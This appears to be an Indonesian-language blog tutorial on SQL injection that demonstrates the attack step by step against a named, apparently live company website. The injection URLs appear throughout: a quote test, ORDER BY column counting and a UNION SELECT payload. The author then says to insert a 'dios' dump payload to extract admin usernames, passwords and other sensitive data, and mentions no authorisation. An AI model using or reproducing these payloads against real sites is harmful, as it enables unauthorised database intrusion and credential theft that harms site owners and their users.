TUTORIAL SQLI INJECTION

 BAGI DI DUNIA PENTESTER DAN BUG HUNTER SQLI INJECTION SUDAH TIDAK ASING LAGI BEGITU PUN DENGAN DUNIA IT

SQLI INJECTION ADALAH SERANGAN PADA WEBSITE YANG MENGGUNAKAN KODE² UNTUK MEMBUKA DATABASE WEBSITE TERSEBUT.

DATABASE WEBSITE YANG BISA DI BUKA SEPERTI RINCIAN WEBSITE, PASSWORD ADMIN, USERNAME ADMIN DAN DATA YANG SENSITIF LAIN LAH BUG INI TERMASUK BUG CRITICAL/BERBAHAYA.

SEKARANG MARI KITA MULAI TUTORIAL SQLI INJECTION PADA WEBSITE

Step by Step

Bahan²

1.live target

2.dios nanti saya kasih

3.kouta

https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1

Nah web tersebut memiliki kerentanan Sqli injection

1.beri tanda kutip di akhir web tersebut contoh

https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1'

2.beri order-by contoh

https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+10--+-

3.maka web tersebut akan eror kecilkan angka nya

Contoh

https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+3--+-

Maka web tersebut akan normal kembali kita hanya perlu mencari ujung eror nya

https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+4--+-

Web nya masih normal 

https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+5--+-

Web nya juga masih normal

https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+6--+-

Nah maka web nya eror

5.Langkah selanjutnya adalah union+select sampai angka yang tidak error tadi

Contoh

https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=-1%27+union+select+1,2,3,4--+-

Oh iya jangan lupa memberi - di depan param atau angka 1 itu

Maka akan muncul angka emas angka emas nya adalah 4

 Maka kita harus memasukan dios ke angka emas tersebut

Dan boom hasilnya:v

Sekian dan terimakasih

Link Dios nyaKlik disini